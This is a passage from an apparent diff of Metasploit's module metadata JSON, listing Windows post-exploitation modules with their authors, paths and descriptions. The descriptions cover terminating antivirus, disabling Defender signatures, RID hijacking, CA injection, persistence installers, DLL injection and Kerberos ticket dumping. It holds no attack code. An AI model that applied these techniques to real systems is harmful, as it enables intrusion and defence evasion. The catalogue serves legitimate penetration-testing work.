"needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/exec_powershell": { - "name": "Windows PowerShell Execution Post Module", - "fullname": "post/windows/manage/exec_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nicholas Nam (nick ", - "RageLtMan " - ], - "description": "This module will execute a PowerShell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/exec_powershell.rb", - "is_install_path": true, - "ref_name": "windows/manage/exec_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/execute_dotnet_assembly": { - "name": "Execute .net Assembly (x64 only)", - "fullname": "post/windows/manage/execute_dotnet_assembly", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "b4rtik" - ], - "description": "This module executes a .NET assembly in memory. It\n reflectively loads a dll that will host CLR, then it copies\n the assembly to be executed into memory. Credits for AMSI\n bypass to Rastamouse (@_RastaMouse)", - "references": [ - "URL-https://b4rtik.github.io/posts/execute-assembly-via-meterpreter-session/" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb", - "is_install_path": true, - "ref_name": "windows/manage/execute_dotnet_assembly", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/forward_pageant": { - "name": "Forward SSH Agent Requests To Remote Pageant", - "fullname": "post/windows/manage/forward_pageant", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan ", - "Ben Campbell " - ], - "description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/post/windows/manage/forward_pageant.rb", - "is_install_path": true, - "ref_name": "windows/manage/forward_pageant", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/hashcarve": { - "name": "Windows Local User Account Hash Carver", - "fullname": "post/windows/manage/hashcarve", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "p3nt4" - ], - "description": "This module will change a local user's password directly in the registry.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/hashcarve.rb", - "is_install_path": true, - "ref_name": "windows/manage/hashcarve", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/ie_proxypac": { - "name": "Windows Manage Proxy PAC File", - "fullname": "post/windows/manage/ie_proxypac", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.", - "references": [ - "URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1", - "URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/ie_proxypac.rb", - "is_install_path": true, - "ref_name": "windows/manage/ie_proxypac", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/inject_ca": { - "name": "Windows Manage Certificate Authority Injection", - "fullname": "post/windows/manage/inject_ca", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/inject_ca.rb", - "is_install_path": true, - "ref_name": "windows/manage/inject_ca", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/inject_host": { - "name": "Windows Manage Hosts File Injection", - "fullname": "post/windows/manage/inject_host", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/inject_host.rb", - "is_install_path": true, - "ref_name": "windows/manage/inject_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/install_python": { - "name": "Install Python for Windows", - "fullname": "post/windows/manage/install_python", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Michael Long " - ], - "description": "This module places an embeddable Python3 distribution onto the target file system,\n granting pentesters access to a lightweight Python interpreter.\n This module does not require administrative privileges or user interaction with\n installation prompts.", - "references": [ - "URL-https://docs.python.org/3/using/windows.html#windows-embeddable", - "URL-https://attack.mitre.org/techniques/T1064/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/manage/install_python.rb", - "is_install_path": true, - "ref_name": "windows/manage/install_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/install_ssh": { - "name": "Install OpenSSH for Windows", - "fullname": "post/windows/manage/install_ssh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Michael Long " - ], - "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.", - "references": [ - "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview", - "URL-https://github.com/PowerShell/openssh-portable" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/install_ssh.rb", - "is_install_path": true, - "ref_name": "windows/manage/install_ssh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/kerberos_tickets": { - "name": "Kerberos Ticket Management", - "fullname": "post/windows/manage/kerberos_tickets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Will Schroeder", - "Spencer McIntyre" - ], - "description": "Manage kerberos tickets on a compromised host.", - "references": [ - "URL-https://github.com/GhostPack/Rubeus", - "URL-https://github.com/wavvs/nanorobeus" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/manage/kerberos_tickets.rb", - "is_install_path": true, - "ref_name": "windows/manage/kerberos_tickets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "DUMP_TICKETS", - "description": "Dump the Kerberos tickets" - }, - { - "name": "ENUM_LUIDS", - "description": "Enumerate session logon LUIDs" - }, - { - "name": "SHOW_LUID", - "description": "Show the current LUID" - } - ] - }, - "post_windows/manage/killav": { - "name": "Windows Post Kill Antivirus and Hips", - "fullname": "post/windows/manage/killav", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Marc-Andre Meloche (MadmanTM)", - "Nikhil Mittal (Samratashok)", - "Jerome Athias", - "OJ Reeves" - ], - "description": "This module attempts to locate and terminate any processes that are identified\n as being Antivirus or Host-based IPS related.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/killav.rb", - "is_install_path": true, - "ref_name": "windows/manage/killav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "os-resource-loss" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/make_token": { - "name": "Make Token Command", - "fullname": "post/windows/manage/make_token", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Daniel López Jiménez (attl4s)", - "Simone Salucci (saim1z)" - ], - "description": "In its default configuration, this module creates a new network security context with the specified\n logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and\n a new logon session is created and linked to that token. The token is then impersonated to acquire\n the new network security context. This module has no effect on local actions - only on remote ones\n (where the specified credential material will be used). This module does not validate the credentials\n specified.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-06 09:07:57 +0000", - "path": "/modules/post/windows/manage/make_token.rb", - "is_install_path": true, - "ref_name": "windows/manage/make_token", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "make_token", - "maketoken" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/migrate": { - "name": "Windows Manage Process Migration", - "fullname": "post/windows/manage/migrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "phra " - ], - "description": "This module will migrate a Meterpreter session from one process\n to another. A given process PID to migrate to or the module can spawn one and\n migrate to that newly spawned process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/migrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/migrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/mssql_local_auth_bypass": { - "name": "Windows Manage Local Microsoft SQL Server Authorization Bypass", - "fullname": "post/windows/manage/mssql_local_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Scott Sutherland " - ], - "description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2k-2k8, LocalSystem\n is assigned syadmin privileges. Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating to the SQL Server process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", - "is_install_path": true, - "ref_name": "windows/manage/mssql_local_auth_bypass", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/multi_meterpreter_inject": { - "name": "Windows Manage Inject in Memory Multiple Payloads", - "fullname": "post/windows/manage/multi_meterpreter_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "David Kennedy \"ReL1K\" " - ], - "description": "This module will inject into several processes a given\n payload and connect to a given list of IP addresses.\n The module works with a given lists of IP addresses and\n process IDs if no PID is given it will start the given\n process in the advanced options and inject the selected\n payload into the memory of the created module.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/multi_meterpreter_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/nbd_server": { - "name": "Windows Manage Local NBD Server for Remote Disks", - "fullname": "post/windows/manage/nbd_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/nbd_server.rb", - "is_install_path": true, - "ref_name": "windows/manage/nbd_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/peinjector": { - "name": "Peinjector", - "fullname": "post/windows/manage/peinjector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Maximiliano Tedesco " - ], - "description": "This module will inject a specified windows payload into a target executable.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/peinjector.rb", - "is_install_path": true, - "ref_name": "windows/manage/peinjector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/persistence_exe": { - "name": "Windows Manage Persistent EXE Payload Installer", - "fullname": "post/windows/manage/persistence_exe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Merlyn drforbin Cousins " - ], - "description": "This module will upload an executable to a remote host and make it Persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login,\n SYSTEM will start on system boot but requires privs. SERVICE will create a new service\n which will start the payload. Again requires privs.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/persistence_exe.rb", - "is_install_path": true, - "ref_name": "windows/manage/persistence_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/portproxy": { - "name": "Windows Manage Set Port Forwarding With PortProxy", - "fullname": "post/windows/manage/portproxy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/portproxy.rb", - "is_install_path": true, - "ref_name": "windows/manage/portproxy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/build_net_code": { - "name": "Powershell .NET Compiler", - "fullname": "post/windows/manage/powershell/build_net_code", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-14", - "type": "post", - "author": [ - "RageLtMan " - ], - "description": "This module will build a .NET source file using powershell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path the\n a .pfx formatted certificate. Compiler options and a list of assemblies\n required can be configured in the datastore.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/build_net_code.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/build_net_code", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/exec_powershell": { - "name": "Windows Manage PowerShell Download and/or Execute", - "fullname": "post/windows/manage/powershell/exec_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nicholas Nam (nick ", - "RageLtMan " - ], - "description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/exec_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/load_script": { - "name": "Load Scripts Into PowerShell Session", - "fullname": "post/windows/manage/powershell/load_script", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Turner benpturner ", - "Dave Hardy davehardy20 " - ], - "description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/load_script.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/load_script", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/pptp_tunnel": { - "name": "Windows Manage Remote Point-to-Point Tunneling Protocol", - "fullname": "post/windows/manage/pptp_tunnel", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. Be sure to allow forwarding and\n masquerading on the VPN server (mitm).", - "references": [ - "URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/pptp_tunnel.rb", - "is_install_path": true, - "ref_name": "windows/manage/pptp_tunnel", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/priv_migrate": { - "name": "Windows Manage Privilege Based Process Migration ", - "fullname": "post/windows/manage/priv_migrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Josh Hale \"sn0wfa11\" ", - "theLightCosine " - ], - "description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/priv_migrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/priv_migrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/pxeexploit": { - "name": "Windows Manage PXE Exploit Server", - "fullname": "post/windows/manage/pxeexploit", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "scriptjunkie" - ], - "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/pxeexploit.rb", - "is_install_path": true, - "ref_name": "windows/manage/pxeexploit", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/reflective_dll_inject": { - "name": "Windows Manage Reflective DLL Injection Module", - "fullname": "post/windows/manage/reflective_dll_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "b4rtik" - ], - "description": "This module will inject a specified reflective DLL into the memory of a\n process, new or existing. If arguments are specified, they are passed to\n the DllMain entry point as the lpvReserved (3rd) parameter. To read\n output from the injected process, set PID to zero and WAIT to non-zero.\n Make sure the architecture of the DLL matches the target process.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/reflective_dll_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/reflective_dll_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/remove_ca": { - "name": "Windows Manage Certificate Authority Removal", - "fullname": "post/windows/manage/remove_ca", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module removes the specified CA certificate from the\n system Trusted Root store.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/remove_ca.rb", - "is_install_path": true, - "ref_name": "windows/manage/remove_ca", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/remove_host": { - "name": "Windows Manage Host File Entry Removal", - "fullname": "post/windows/manage/remove_host", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module allows the attacker to remove an entry from the Windows hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/remove_host.rb", - "is_install_path": true, - "ref_name": "windows/manage/remove_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/rid_hijack": { - "name": "Windows Manage RID Hijacking", - "fullname": "post/windows/manage/rid_hijack", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sebastian Castro " - ], - "description": "This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.", - "references": [ - "URL-https://web.archive.org/web/20240520163742/https://csl.com.co/rid-hijacking/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/rid_hijack.rb", - "is_install_path": true, - "ref_name": "windows/manage/rid_hijack", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/rollback_defender_signatures": { - "name": "Disable Windows Defender Signatures", - "fullname": "post/windows/manage/rollback_defender_signatures", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "metasploit ", - "luisco100 " - ], - "description": "This module with appropriate rights uses the Windows Defender command-line utility to run an automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": 